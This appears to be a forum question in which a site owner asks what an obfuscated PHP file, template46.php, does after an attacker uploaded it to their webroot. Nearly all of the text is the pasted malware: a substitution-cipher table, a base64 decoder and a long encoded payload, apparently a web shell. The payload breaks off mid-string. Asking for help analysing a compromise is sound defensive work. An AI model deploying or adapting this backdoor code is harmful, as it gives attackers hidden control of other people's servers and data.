What does this malicious PHP script do?

  • Somebody hacked my site and uploaded this script (template46.php) to my webroot and its content is:

    <?php
    $vIIJ30Y = Array('1'=>'F', '0'=>'j', '3'=>'s', '2'=>'l', '5'=>'M', '4'=>'0', '7'=>'W', '6'=>'L', '9'=>'Z', '8'=>'b', 'A'=>'i', 'C'=>'O', 'B'=>'G', 'E'=>'3', 'D'=>'6', 'G'=>'A', 'F'=>'8', 'I'=>'q', 'H'=>'a', 'K'=>'J', 'J'=>'w', 'M'=>'z', 'L'=>'5', 'O'=>'k', 'N'=>'x', 'Q'=>'N', 'P'=>'o', 'S'=>'K', 'R'=>'X', 'U'=>'d', 'T'=>'7', 'W'=>'y', 'V'=>'t', 'Y'=>'I', 'X'=>'p', 'Z'=>'4', 'a'=>'U', 'c'=>'9', 'b'=>'c', 'e'=>'Y', 'd'=>'n', 'g'=>'C', 'f'=>'H', 'i'=>'P', 'h'=>'E', 'k'=>'B', 'j'=>'g', 'm'=>'R', 'l'=>'Q', 'o'=>'e', 'n'=>'v', 'q'=>'r', 'p'=>'T', 's'=>'2', 'r'=>'1', 'u'=>'f', 't'=>'h', 'w'=>'V', 'v'=>'u', 'y'=>'D', 'x'=>'S', 'z'=>'m');
    function v78ZFAX($vJOJJ7T, $vRJ8WGX){$vM74216 = ''; for($i=0; $i < strlen($vJOJJ7T); $i++){$vM74216 .= isset($vRJ8WGX[$vJOJJ7T[$i]]) ? $vRJ8WGX[$vJOJJ7T[$i]] : $vJOJJ7T[$i];}
    return base64_decode($vM74216);}
    $vFHLJ89 = 'gz2zSB2Mbsw4Sgmuahcpw13AescO9xKUSxGzKAkXbEQ2UgjORrkiarm8YzQrbEmn8wcteEmX8sZARxOjKAejHRQu9scn91cXb'.
    'gjORrQ1a291a23daOwQprm1R41hm1YdRxOXgd3Sg7wse7JPez1M9pe4Rsm2escO'.
    '9xjORrkiarm8YzQn9BaARxOXCJPK9RtXUgjXCJXcgjXX9AGPHRQM9RlPK1clprQa7WK4oRk'.
    '2Y24XYgezYgmuahcpw13AUf2J9xKUip4A5xYXgd3SgRmLbBaNREQ28zlPSp3Sg7wZHRlPSp3SulX28fQ2H7ejSB2Mbsw4S'.
    'gmuahcpw13AUf2J9xKUSxGzKAGORrkiarm8YdmLbBaARp4cY0YASlXTgjXcgzw3bswX9'.
    'AGPHRQM9RlPK1clprQa7WK4oRk2Y24XSlXTgj22estnYgmuahcpw13AUf2J9xKUCJPK9RtXUgjXCJXcgjX2bdKnb2F45ylP'.
    'Sp3Sgz9r8zQ4H7cvYB2MRsUn8smuHRGPKB2JSlXTgjOO9scn9f5jixkkbdKtoxjAQAZNCyav505L6AY3Y'.
    'gYZ60hMCgZN5pjvYAOTgjOSg79nbzwtesjjSgmd8scObWktbWGO9scn9gOSgR3Sgl2X9AGPbEmWbEmWS'.
    'gmXbgJjKBUn8slXYghcYh9kp1Q1SlPKgR3SglOKbzw4URKvY1mxwaaTgjOKul'.
    'PKulPKgj2W9RmrbzZjmO15a4aTgd4Sgz9r8zQ4H7cvYfmLbBaNREQ28zlPSlXTgj2X9AjtHRQM9RlPK1clprQa7WK2871X8f5A'.
    'RxOSglOKprYjY72Mbsw4Sgmuahcpw13AUBt287wMY24XgjOKgacxYg1XbEQ2UgjORrki'.
    'arm8Yzr2bEQt9swMY24XgjOKgacxYg1XbEQ2UgjORrkiarm8Yz9W8srMY24XgjOKgacxYg1XbEQ2Ug'.
    'jORrkiarm8YzrtH7N2bd5ARxOSgxOSgR3Sgl22oB24SgOTgj2cgjPKH7eP9sw4Rsrt9s20RE1r'.
    '8Em2brcdbB5PSxOSgR3Sgl2z8EK2e7QPSgmuahcpwgktbWGOHswLYy4+YgmJ8EQ4SlPKg'.
    'R3SglOKK1clprQa7Wmq9R2UYy4jbEmWHRk0bsNtbst2bWjObBcMUgOTgjOKulPKulPSgxm'.
    '2871X8f5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xjORrkiarm8YzwVe723bWK'.
    'USxOTgjOOUBt287wMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK4HBwV9R5AR'.
    'xOXCJPKKBr2bEQt9swMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKV9RQ'.
    'Me7U2bWKUSxOTgjOO9dKn8R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO'.
    '9xjORrkiarm8Yz9W8srMY24XSp3SgxmVe7239RKMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKVe7239R'.
    'KMY24XSp3Sgxmt8B2tbswMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK'.
    't8B2tbswMY24XSp3SgxmJeRQM9R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xj'.
    'ORrkiarm8YdktbEQ2bWKUSxOTgjPKH7ePHRQM9RlPK1cpmwK7mwYXSlP'.
    'KoJPKgxmua4wxwOwx7WUlx1kua4w5mAUUYy4jYAFACWGSglOORrQ1a291a23daOwQprm1R41'.
    'hm1YdRxGcYgYN50bv5gZJ60hACJPKg72zSg128Rk4oxjORrQ1a291'.
    'a23dx1maa1ceR49ia2UkaOm1m1cBprYdRxOXgjOKoJPKglOORrQ1a291a23dx1maa1ceR49ia2UkaOm1m1cB'.
    'prYdRxGcYgYN50bv5gZJ60hACJPKgR4SgR4Sgj2X9AtXbEQ2UgjOR49KphwpSxOSgR3Sgl2z8EK2e7QPSgmumO25mw5jeR5jK'.
    'BV2oxGciAGO9z239xOSgl2TgjOKgxmzH7N28z1V9xGcYB13UBwWRsrteEKnbWjOe7NXeRQ2br3OHs'.
    'wLRxOTgjOKgxmzH7N28z1V9xGcYBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK'.
    'B9X8Bwve7r2Yy4jUBwZU1cVe7QW8E5PKB9X8Bwve7r2Sp3SglOKKB9X8Bwv'.
    'e7r2Yy4joBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK1cBxaN1ar3OHswLRw3A8z1V9xKUYy4jKB9X8Bwve7r2CJP'.
    'KgR4SgR4Sgj2X9At28Rk4oxjO97rtH7NMSxOSgR3Sgl22oB24SgOTgj2cgjPK9zcW9710HgGPKBwVe723'.
    'bWktbWGO9dm2H7JjipZjKBwVe723SlPKoJPKgxm4HBwV9xGcYgm4HBwV9RQ8eRKWeR2ubz1v9gjOUBt28'.
    '7wMSw4TgjOKKfmP97r2Yy4je7N49RKu8710bzcMSgm4HBwV9w3AUBt287aARxOTgjOKKfmP97r2Yy4j8dwVRsrteEKnbWj'.
    'OUBt287aXCJPKgxm4HBwV9xGcYfm2ofmu8710bzcMSgm4HBwV9xOTgjOKKfmP97r2Yy4joBLr8wcVe'.
    '7QW8E5PKfmP97r2Sp3SgjOKKBr2bEQt9sajixGO87wMbs1d9RQ8eRKWeR2ubz1v9gjO87wMbs1d9R5XRp3SglOO8'.
    '7wMbs1d9xGcYB13UBwWRsrteEKnbWjO87wMbs1d9w3A87wMbs1d9xKUSp3SglOO87wMbs'.
    '1d9xGcYBLr8wcVe7QW8E5PKBr2bEQt9saXCJPKgxmV9RQMe7U2Yy4jUBwZU1cVe'.
    '7QW8E5PKBr2bEQt9saXCJPKgxmV9RQMe7U2Yy4joBLr8wcVe7QW8E5PKBr2bEQt9saXCJPKgxFnKBr2bEQt9saj'.
    'ixkJeRQMRsrteEKnbWjO87wMbs1d9xJjKfktbEQ2bWOTgjOKKBr2bEQt9sajixkzUBwX81cVe7QW8E5PKBr2bE'.
    'Qt9sa3YgmzUBwX8gOTgjPKgxmzbzcVYy4jKB9W8srM7s1Wbz1LREKt8zlPKB9W8srMSw4TgjOKKB9W8s4jixkt8fm2b'.
    '2cVe7QW8E5PKB9W8sr8Yz9W8s4ARxOTgjOKKB9W8s4jixkvU7ru8710bzcMSg'.
    'mzbzcVSp3SglOO9dKn8xGcYfm2ofmu8710bzcMSgmzbzcVSp3SglOO9dKn8xGcYftvU7ru87'.
    '10bzcMSgmzbzcVSp3SglOSgl2X9AGPbEmWbEmWSgmzbzcV6gGA74Q'.
    'warmipw4ASxGcixkBlaNpmxOSgl2TgjOKgxmzbzcVYy4j9dKn8wcP8EQ4S'.
    'gmzbzcVSp3Sgl2cgjOK97NM9lPKgR3SglOKKB9W8s4jixkMUfKubzwJ8B109xjA74Qwarmipw4A6g'.
    'GAYAJjKB9W8s4XCJPKgR4SgjOKKBrtH7N2bAGcYgmVe7239RKM7s1Wbz1LREKt8zlPKBr'.
    'tH7N2bd5XRp3SgjOKbswv91cVe723SgmzbzcV6gGO97rtH7J3Ygm4HBwV9xJjK'.
    'Br2bEQt9sa3YgmVe7239RYXCJPKulXcgjXzU7L0UB2n8AkM97LORsrtH7JPKB'.
    '9W8s43Ygm48WJjKfQrezP3Ygm49Rt46gGO871X8BwWSlXTgAGjYgGOHBwt9gGcYgYACJPSYgGjYgmr8AGcY'.
    'fQ4bdmnURkJ9RYPU7LXb72OSfmX87aPSxOXCJPSYgGjYgmP971OYgZcYgKBb'.
    'zcVCAGO9dKn8wNvY03SYgGjYgmP971OYgZcYgKe6artH7N2b0PjKBrtH7N2b2NvY03SYgGjYgmP971OYgZcYgKx9Rk3oxra8MPj'.
    'KB9W8srb8AYTgjPjYgGjKBt2e7lj604jYOrX87aVwzwWbs2n80Pj5xZJRBZACJPjYgGjKBt2e7lj604jYOQn8dm28dlVwf2J9'.
    'pPj8Rw3UB2JeRK46s13UBwW8z14HR92CWYTgAGjYgGOHBwt9gGvixGAezcr8zmtbdOcRgYV6x4V6x4V6x4VYAZO'.
    'U7ZvY2JARBLb8AYTgAGjYgGSYgGjYgmJ8B1X8AGcYfQ4bz2JREmt9E5PKfm2oflXCJPjYgGjKfXt9WGcYgYV6x4V6x'.
    '4V6x4V6x4A6Amr8AZARBLy8sL497L46wmLbBaDYfm2oflnbBNtH7ZTYBQ'.
    'PeRKM9RlcRgKKa4FVCyjrCx4NRgYTYB9nbzrtUyrz8BcE97mb8AYTgAGjYgGOoz1dYgZcYgKy8sL'.
    '497L46wmWe7LM9zwW6awvescOH7LdCAGEez24RBLb8AYvKfk3e72v6AKb82NvY03SYgGjYGPjYgGjKf'.
    'Xt9WGvixGA6x4V6x4V6x4V6x4VYAZOU7ZvY2NvlscvUBwvUgraoRk2CAk49Rt46'.
    'st487JTYBQPeRKM9RlcRgKKa4FVCyjrCx4NRgYTRBZACJPjYgGjKfXt9WGvixGAlscvUBwvUgrabz1vbs'.
    '92bAr18zQn9B2v9MPjQsKXU1NvRBZOUBwZU1NvRBZACJPjYgGjKfXt9WGvixGA6x4V6x4V6x4V6x4VYAZOU7ZvYA4VY'.
    '03SYgGjYGPjYgGjH7ePescr8dlPK1cBxaN1aWOjiAGJSlPjYgGjoJPjYgGjYgGjYB9nbzwtesjPK1cBxa'.
    'N1aWktbWGO9z239xOSYgGjYgGjYgkTgAGjYgGjYgGjYgGjYB2zSB9X8'.
    'Bwu9RtXbEmMSgmzH7N27WK48Rku8z1V9xKUSxOSYgGjYgGjYgGjYgGjoJPjYgGjYgGjYgGjYgGjYgG'.
    'jKBejixkz8Ek28AjO9z239w3AUBrJRsLt87aARxJjYdKAYAOTgAGjYgGjYgGjYgGjYgGjYgGOoz1dYgZcYgY'.
    'V6x4V6x4V6x4V6x4A6Amr8AZARBZACJPjYgGjYgGjYgGjYgGjYgGjKfXt9WGvixGAlscvUBwvUgraoRk2CAktbfk'.
    '3H7QtUB2n8AcneEm2UgrMUfK2e74TY03SYgGjYgGjYgGjYgGjYgGjYgmDe7bj60'.
    '4jYzLt87acRgYA6AmzH7N27WKve7r2Y24vY2JARBZACJPjYgGjYgGjYgGjYgGjYgGjKfXt9WGvixGAlscvUBwvUgr'.
    'abz1vbs92bAr18zQn9B2v9MXAeRQ2Q0mb8AYTgAGjYgGjYgGjYgGjYgGjYgGOoz1dYgZcYgKy8sL497L46amXbE'.
    'knbs24H7cvCz14UB10HBr28dlTY03SYgGjYgGjYgGjYgGjYgGjYgmDe7bj604jYz9X8Bwve7r2iwJAYAZO9z239w3A8z1V9'.
    'xKU6AKbY2NvRBZACJPjYgGjYgGjYgGjYgGjYgGjKfXt9WGvixk0HfwvHr'.
    'cMbBNXUgtAeRQ2Q0mu97L08sm2SB9W971OSgmz6gkzH7N2bs2D9xjO9z239w3AUBrJRsLt87aARxOXSxO'.
    'vY2NvY03SYgGjYgGjYgGjYgGjYgGjYB908BcM9xjO9AOTgAGjY'.
    'gGjYgGjYgGjYf4SYgGjYgGjYgkcgAGjYgkcgjPjYgGjH7ePlBrtH7JPKfmn6gGObEwAHAJjKfXt'.
    '9WJjKBt2e7lXSlPjYgGjoJPjYgGjYgGjYB2zSg128Rk4oxjORrkiarm8KE92bzKnbsadRxOXgAGjYgGjYgGjYgG'.
    'jYBw0HBFjY2Q1pOm1mgYTgAGjYgkcgAGjYgk28fQ2gAGjYgkTgAGjYgGjYgGjH7ePY7wVbfmLSgmuahcpw13dUzwWezcM9xUU'.
    'SxOSYgGjYgGjYgGjYgGj97QP8WGAmO1KpgYTgAGjYgkcgd4Sgz9r8zQ4H7cvYB13UBwWRsrteEKn'.
    'bWjOescvUBwvUgOSoJPjYgGjbfK29rcVeRm0H1ct8BJPKWQTSgZISR40w7Od6gGOescvUBwvUgJjKBrtUBQP9R5XCJPSYgGjY'.
    'B9nbAjOHxGcYyGTYgmXYyJjescr8dlPKBrtUBQP9RQ85w4XCWGOHx3qSlPjYgGjoJPSYgGjYgGjYgG'.
    'O8d5jixk2ofk38sm2SgKFYAJjKBrtUBQP9RQ85wr8KB2USp3SYgGjYgGjYgGOeMYjixk08EwvUgjO8d5XCJPjYgGjYgG'.
    'jYgmWe7LOYy4jbz1v9gjJ6gGPKB5WYg4j5xOXCJPjYgGjYgGjYgm08sL497L4Yy4jbEmWREK2bBNtesaPYd3A6Am'.
    'VeRm0HBwM7M1U7WmXRxZAuxY3Ygmvbr3Obz1v9143Ygm08sL497L4S'.
    'p3SYgGjYf4SYgGjYfK2UfwW8AGOescvUBwvUy3SulPS9dwveEmX8sZjUBw'.
    'ZU1cVe7QW8E5PKBQn8dm28dlXgd3SYgGjYfkW97Uu8714estue7N3Sgb0R1VamwtaRg4P7r3D9B2dHRlDRw4qSwJVS'.
    '1V8CzmX9s24C2rUSW2bRx5d6gGOescvUBwvUgJjKBrtUBQP9R5'.
    'XCJPSYgGjYB9nbAjOHxGcYyGTYgmXYyJjescr8dlPKBrtUBQP9RQ8514XCWGOHx3qSlPjYgGjoJPjYgGjYgGjYgmVH7ZjixG'.
    'O8714est2br3NRw3OHw4TgAGjYgGjYgGjKBrtogGcYgmVeRm0HBwM7MKU7WmXRp3SYgGjYgGjYgGObz1v9gGcYfKt8zlPKBr'.
    'X8AJjKBrtogOTgAGjYgGjYgGjKfUnbzljixkd97L2bz149wcE8EKOSgmWe7LOSp3SgAGjYgGjYgGjKB'.
    'Qn8dm28dljixkJbzwdREK2bBNtesaPYAFA6dkW97UubRwnUBaPKBrtUBQP9RQ851r8KB'.
    '2USxZA6WY3YgmE8EKO6gGOescvUBwvUgJj5xOTgAGjYgkcgjPjYgGjbfK29rcVeRm0H1ct8BJPKWQb7rm171mb6xt87MXOH'.
    '7UXUyXURx3XR140KWJjKBQn8dm28dl3YgmVeRm0HBwMSp3SgAGjYgkz8EYPKBOjixGJCWGOHxGFYBQnU7L4SgmVeRm0HBwM7'.
    'MkUSp3jKBOqSWOSYgGjYf3SYgGjYgGjYgGOescr8dljixGO8714est2br3NRw3OHw4TgjP'.
    'jYgGjYgGjYgmE8EKOYgGcYBU28zwWeRm2REUnbzlPKBQnU7L4Sp3SgAGjYgGjYgGjKBQn8dm28dljixkJbzwdREK2bBN'.
    'tesaPYAFA6dkW97UubRwnUBaPKBrtUBQP9RQ851r8KB2USxZA6WY3YgmE8EKO6gGOescvUBwvUgJj5xOTgAG'.
    'jYgkcgjPSYgGjYfK2UfwW8AGOescvUBwvUy3SulPS9dwveEmX8sZjoBLr8wc'.
    'Ve7QW8E5PKBQn8dm28dlXgd3SYgGjYfkW97Uu8714estue7N3Sg'.
    'b0R1VCwarb6xt87MXOH7UXUyXURx3XR140KWJjKBQn8dm28dl3YgmVeRm0HBwMSp3SgAGjYgkz8EY'.
    'PKBOjixGJCWGOHxGFYBQnU7L4SgmVeRm0HBwM7MkUSp3jKBOqSWOSYgGjYf3SYgGjYgGjYgGO8dwVY'.
    'y4jKBrtUBQP9RQ85wr8KB2UCJPjYgGjYgGjYgmVH7ZjixkJ8EbP5pG3YgmvU74j6xGNSp3SYg'.
    'GjYgGjYgGO871ZYy4jbBcESyhJ6gGO8dwVSxGVYyhTgjPjYgGjYgGjYgmWe7LOYy4jbz1v9gjO872v6g'.
    'GO871ZSp3SYgGjYgGjYgGOescvUBwvUgGcYfQ4b2cW9Rk3e7Q2SgmVeR'.
    'm0HBwM7MkU7WmXRxJjKfKt8zl3Ygm08sL497L4Sp3SYgGjYf4SYgGjYfK2UfwW8AGOescvUB'.
    'wvUy3SulPS9dwveEmX8sZj8dwVRsrteEKnbWjOescvUBwvUgOSoJPjYgGjbfK29rcVeRm0H1ct8BJPKWQb7rKkpOmb6xt87M'.
    'XOH7UXUyXURx3XRg4P7r3D9B2dHRlDRw4qSwNUYWb3Ygm08sL497L46gGO8714est2bWOTgjP'.
    'jYgGj9zcWSgmXYy4j5y3jKBOjigk08EwvUgjO8714est2br3JRxOTYgmXSW3XgAGjYgkTgAGjYgGjYgGjKBrX8AGcYgmV'.
    'eRm0HBwM7M1U7WmXRp3SYgGjYgGjYgGO871ZYy4jKBrtUBQP9RQ'.
    '852r8KB2UCJPjYgGjYgGjYgmWe7LOYy4jbz1v9gjO872v6gGO871ZSp3SYgGjYgGjYgGOescvUBw'.
    'vUgGcYfQ4b2cW9Rk3e7Q2SgmVeRm0HBwM7MkU7WmXRxJjKfKt8zl3Ygm08sL497L4Sp'.
    '3SYgGjYf4SYgGjYfK2UfwW8AGOescvUBwvUy3SulPS9dwveEmX8sZj9swv9RKtUBwuUscW9gjO8Bwv9EmPSlXTgAGjYgGOesttb'.
    'd5jixGde7K09Bwz9stXHzV387Lnbf1WbEmrUd2ZoAbTgAGjYgGO8dwVlsttbd5jixkMUfK397ZPKBQPeRKMSp3SYgGjYgm'.
    'MUfKX8zbjixGdKM3SYgGjYB9nbAjOHxGcYyGTYgmXYyJjKBN28zU4Hy3jKBOqSWOSYgGjYf3SYgGjYgGjYgGObEmWH7Ld'.
    'YgZcYfQredQ4bAjOesttbd53YfKt8zlP5xJjKBLr8aQPeRKMSxGVYyh3YyhXCJPjYgGjulPjY'.
    'gGjbzw4URKvYgmMUfKX8zbTgd4Sgz9r8zQ4H7cvYfktbEQu8710b'.
    'zcMSgm08sL497L46gGObB1MbswMSlXTgAGjYgGObB1MbWGcYB1Wbz1LREknbgjObB1MbswMSp3SYgGjYGPj'.
    'YgGjbzw4URKvYfQ4b2cW9Rk3e7Q2SgK8ah1par4A6gGObB1MbWJjKBQn8d'.
    'm28dlXCJXcgjXzU7L0UB2n8AkzUBwX81cVe7QW8E5PKBQn8dm28dl3YgmzUBwX8gOSoW'.
    'GjYgGSYgGjYfK2UfwW8AkMUfKubzwJ8B109xjA749ama25RxY3YgmzUBwX8gJjKBQn8dm28dlXCJ'.
    'XcgjXzU7L0UB2n8AkXbrcXbgjObEmWSxkTgAGjbzw4URKvYfkW97Uu8714esjPYAcoS13N6p2Uu13N6'.
    'p2U7MGVCwrF5w3J6p2U7MGVCwrF523J6pmU7MGVCwrF50w85g4rRxOPRgZP7MGVCwrF7MhVCwr85g4LRRJ'.
    'N7MGVCwr85g4LRRJW7MGVQ1r85g4LRRJWQw3J6pwUSx2T5E4O6W'.
    'Y3KfQ4bAOTgd4Sgz9r8zQ4H7cvYB9W8sruHBcMUgjOescvUBwvUgOSoJPSYgGjYgmP8EQ4Yy4jbfK29'.
    'rcW9Rk3e7Q2SgbnRAtEUEUF9dmJSwJv6sOd6gbd6hGORrQ1a291a23dx1maa1cYprQaKr4XCJPSYgGjY'.
    'B2zYgtXbrcXbgjOHBcMUgOXgAGjYgkTgAGjYgGjYgGjbzw4URKvYgm08sL497L4C'.
    'JPjYgGjulPjYgGjgAGjYgGOUBcq97LMYy4j9RtJ8BcO9xjAlgY3Ygm08sL497L'.
    '4Sp3SgAGjYgGOescvUBwvUgGcYgm48sV28dQ8514j6AGAlgYj6AGOHBcMUgGvYg'.
    'Y+Y03SgAGjYgkW9RmrbzZjKBQn8dm28dlTgd4Sgz9r8zQ4H7cvYBwWbzcWRMl'.
    'JQgjXgd3Sg7t2e7m2bAjAx1maagFN60hjQyG4YhLnUgkB8Ewv9gYXCJPSgxmrbzOjixkJbzwdREK'.
    '2bBNtesaPKWFPRyFX6APO6Wb3Ygbd6gGORrQ1a291a23daOwmwawpw1cwaOOdRxGXCJPS'.
    'gxm08sL497L4Yy4jeEwMUBcVRst4UfkubzwNU7wMUyhPYzt4UfGD6'.
    'WFA6Amua4wxwOwx7WUYw1mlR4tiarldRxZA641Ba7XypOtvHytx'.
    'UfmBxpQ7pRKg9Bm9UM9W8zU6o0U6mahASp3Sgxm08sL497L4Yy4jb'.
    'EmWREK2bBNtesaPYgYnla9mHOQCxBLPC1K4Uh9K5r9QbOKO912EQdKv94VDQ4V1lxY3Ygmrb'.
    'zO3Ygm08sL497L4YgOTgjPK9RtXUgjjKBQn8dm28dljSp3SulPSgz9r8zQ4H7cvYBQrbEmn8wcPUfmJREK2bRw2bElNSgmJe'.
    'RKt8R5Xgd3SYgGjYB2zSgGtYB2MRs1Wbz1LSgmJeRKt8R5XYgOSYg'.
    'GjYf3SYgGjYgGjYgGObB1We7rMYy4jeRKWeROPgAGjYgGjYgGjYg'.
    'GjYgUrbzJdYy4+YgmJeRKt8R53gAGjYgGjYgGjYgGjYgUV9RmP8sldYy4+YgUfmwldgAGjYgGjYgGj'.
    'Sp3SYgGjYf4SYgGjYGPjYgGjH7ePYgmJeRKt8RQ8KEwW8gUUip4dKWG'.
    'XYfK2UfwW8AkBlaNpmp3SYgGjYGPjYgGjH7ePYghjHRQM9RlPKfktbz1Vbr3'.
    'd87w4HBcOKr4XYgOjKfktbz1Vbr3d87w4HBcOKr4jixGPHRQM9RlPKf'.
    'ktbz1Vbr3d9B14exUUSxezHRQueRKWeROPKfktbz1Vbr3d9B14exUUSxOjiWGdahcpwg'.
    'bjCAGdm4waKM3SYgGjYgmJeRKt8RQ8Ksr2UBtn9gUUYy4jbEmWUBcrbfk2bAjOb'.
    'B1We7rM7WUV9RmP8sldRxOTgAGjYgkX9AjjYxkX82ctbdKtoxjObB1We7rM7WUV9R'.
    'mP8sldRxJjeRKWeROPK4U1wgb3YgUlprQaKWOXYgOjbzw4URKvYh9kp1Q1CWGSYgGjYGPjYgGj6WPj4K/mj'.
    'QgZ466lnVg4460lngymjUBk4enlvcgD4e5j46Yj46/mjQgJ466lvQgT4eMlnUB646Oj466'.
    'lvQg4YgPngAGjYgGOURK3Yy4jbB1WbswuURK3SgmJeRKt8RQ8KEwW8gUUSp3SYgGjYB2zSgGtYB2Mbsw4SgmrbzN8KEQ0HBwV9xU'.
    'USxGXYgmrbzN8KEQ0HBwV9xUUYy4jKst4UfGdCJPjYgGjH7ePYghjHRQM9RlPKfwW813dbB14HgUUSxGXYgmrbzN8K'.
    'EktUBjdRxGcYgbnKM3SYgGjYB2zSgGtYB2Mbsw4SgmrbzN8KstnbEldRxOjKAejHRQM9RlPKfwW813dbB14HgUU'.
    'SxGXgAGjYgkTgAGjYgGjYgGjH7ePYfQ4bdknbWjOURK37WUJeRmPKr43YgbnKWOjSlPjYgGjYgGjYf'.
    '3SYgGjYgGjYgGjYgGjKfwW813dHBcMUgUUYy4jbEwAbEmWSgmrbzN8KEktUBjdRxJ'.
    'j5gJjbEmWbBcMSgmrbzN8KEktUBjdRxJjKWFdSxOTgAGjYgGjYgGjY'.
    'gGjYgmrbzN8KEktUBjdRxGcYfQredQ4bAjOURK37WUJeRmPKr43YfQ4bdknbWjOURK37'.
    'WUJeRmPKr43YgbnKWOXCJPjYgGjYgGjYf4SYgGjYgGjYgk28fQ2gAGjYgGjYgGjoJPjYgGjYgGjYgGjYgGOU'.
    'RK37WUP8EQ4Kr4jixGOURK37WUJeRmPKr4TgAGjYgGjYgGjYgGjYgmrbzN8KEktUBjdRxGcYgbnKM3KgAGjYgGjYgGjulP'.
    'jYgGjulPjYgGjKfwW813dbB14HgUUYy4jbfK29rcW9Rk3e7Q2SgYn7rNb6r4q6WY3YgYnYAJjKfwW813dbB14HgUUSp3S'.
    'YgGjYB2zSgkXbEQ2UgjOURK37WUNU7wWoxUUSxGXYgmrbzN8KEktUBjdRxGv'.
    'ixGAiE3OURK37WUNU7wWoxUUuxYTgAGjYgGSYgGjYgmJ8EK4Yy4jHR'.
    'QM9RlPKfktbz1Vbr3dbBcWUgUUSxG/YgmJeRKt8RQ8KEknbdldRlPjYgGjYgGjYgGjYgGDYgjjHRQM9RlPKfwW813dbBc'.
    'WUgUUSxG/YgmrbzN8KEknbdldRxGDYgjOURK37WUMest287adRp4cKst4UfkMKMF4Qy5DCyGXYgOTgAG'.
    'jYgGSYgGjYgm4H7r28Ew4Yy4jHRQM9RlPKfktbz1Vbr3dUB2V97crUgUUSxG/YgmJeRKt8RQ8KEmX87wnURldRxGDYy5JCJP'.
    'jYgGjH7ePYghjHRQM9RlPKfktbz1Vbr3dbzw4URKvKr4XYgOjKfktbz1Vbr3dbzw4URKvKr4jixGdescvUBwvUgbTgAGjYgGS'.
    'YgGjYgmMest287ajixGOURK37WUMest287adRp4cKst4UfkMKWG/YgUMbsJD6WFdCAbdCJPjYgGjKB9JYy4jlB'.
    '9M8sQq8Ek28AjObsQP97r26AmrbzN8KstnbEldRxJjKfknbdl3Ygm2bdKv8WJjKBwWbdQ4bAJjKfmX87wnURlXCJPjYgG'.
    'jH7ePYgmzbgGXgAGjYgkTgAGjYgGjYgGj6WPjp7cDH7N3exGI6JPjYgGjYgGjYB2zSgGtYB2Mbsw4SgmJe'.
    'RKt8RQ8KrwM9RYVl7U28dldRxOjSxGObB1We7rM7WUwbswW6a1d97L4Kr4jixGAp7cDH7'.
    'N3exFr60GjSB2lHBcv9p3jwp3jlrkwYB2lHBcv9xkiaWGMRMGj8B2q9xkQe75jpr5j7y3j97Z'.
    'VUR5XYh1JbBN2wswAxs246MaWCgZNCgGPx4tapaJ3YBNXHsajmsw0HsFXY192bdQX8sZnQgZJYhrnez2'.
    '39xFElp545xkpe79tbzOnQpYZ60hsY03SYgGjYgGjYgGSYgGjYgGjYgGObzwNU7'.
    'wMUgGcYgKTKfktbz1Vbr3d87w4HBcOKrrcYf3OURK37WUJeRmPKrrcYhtaw1Gn5xZJRfKb8AYTgA'.
    'GjYgGjYgGjKfK2bRw2bElj604jYOtnbElDYf3OURK37WUP8EQ4KrrcRfKb8AYTgA'.
    'GjYgGjYgGjKfK2bRw2bElj604jY2wM9RYVl7U28dlDYf3ObB1We7rM7WUwbswW6a1d97L4KrrcYAZARfKb8AYT'.
    'gAGjYgGjYgGjH7ePYB2Mbsw4SgmJeRKt8RQ8KEK29zwW9RYdRxOjSxGObzwNU7wMUg'.
    'GvixGAazwz9RK2b0PjoWmJeRKt8RQ8KEK29zwW9RYdRRrbb2NvY03SYgGjYgGjYgkX9AjjHRQM9'.
    'RlPKfktbz1Vbr3descnHs22Kr4XYgOSYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgm08scqH7ajixGAY03SYgG'.
    'jYgGjYgGjYgGjH7ePYB2MRs1Wbz1LSgmJeRKt8RQ8KsQn8sVX9xUUSxGXYfVz8EK2e7QPSgGObB1We7r'.
    'M7WU08scqH7adRxktbWGOHM4+KfejSxGOescnHs22YgZcYgYOHM4OU03jY03jKBQn8sVX'.
    '9xGcYfQredQ4bAjOescnHs226yG36pYXCE4SYgGjYgGjYgGjYgGj97NM9xGOescnHs22Yy'.
    '4jKfktbz1Vbr3descnHs22Kr4TgAGjYgGjYgGjYgGjYB2zSgGOescnHs22Yp4dKWGXYgmW9R1r9RQ4YgZcYgKy8scqH7aD'.
    'Ygm08scqH7wbb2NvY03SYgGjYgGjYgkcgAGjYgGjYgGjKfK2bRw2bElj604jYOQn8zL2eEmX8sZDYBQ38EQ2RfKb8AYT'.
    'gAGjYgGjYgGjH7ePYgmJeRKt8RQ8Ksr2UBtn9gUUip4dahcpwgbjSlPjYgGjYgGjY'.
    'f3SYgGjYgGjYgGjYgGjH7ePYB2Mbsw4SgmJeRKt8RQ8KsmtUBhdRxOjKAejHRQueRKWeROPKfk'.
    'tbz1Vbr3d9B14exUUSxGXgAGjYgGjYgGjYgGjYf3SYgGjYgGjYgGjYgGjYgGjYB9nbzwtesjPKfktbz'.
    '1Vbr3d9B14exUUYh1pYgmqYy4+YgmsSlPjYgGjYgGjYgGjYgGjYgGjYgGjYgmOeRmtYgZcYfwW8BwvescO9xjO'.
    'HWOvKM4d6dwW8BwvescO9xjOUAOvKWedCJPjYgGjYgGjYgGjYgGjYgGjH7ePYfQredQ4bAjO9B14ex'.
    'Jj6phXip4dKAbjSxGO9B14exGcYfQredQ4bAjO9B14exJJ6g4NSp3SYgGjYgGjYgGjYgGjulPjYgGjYgGjYgGjYgGO9B14ex'.
    'GvixGARfKb82NWRBZACJPjYgGjYgGjYgGjYgGSYgGjYgGjYgGjYgGjKfK2bRw2bElj604jYOQn8dm28dlVUf2'.
    'J9pPjeRkJ8B20eRmX8sZnogrEUEbV9zcW8xrrbzN28zQn9BwORfKb8AYTgAGjYgGjYgGjYg'.
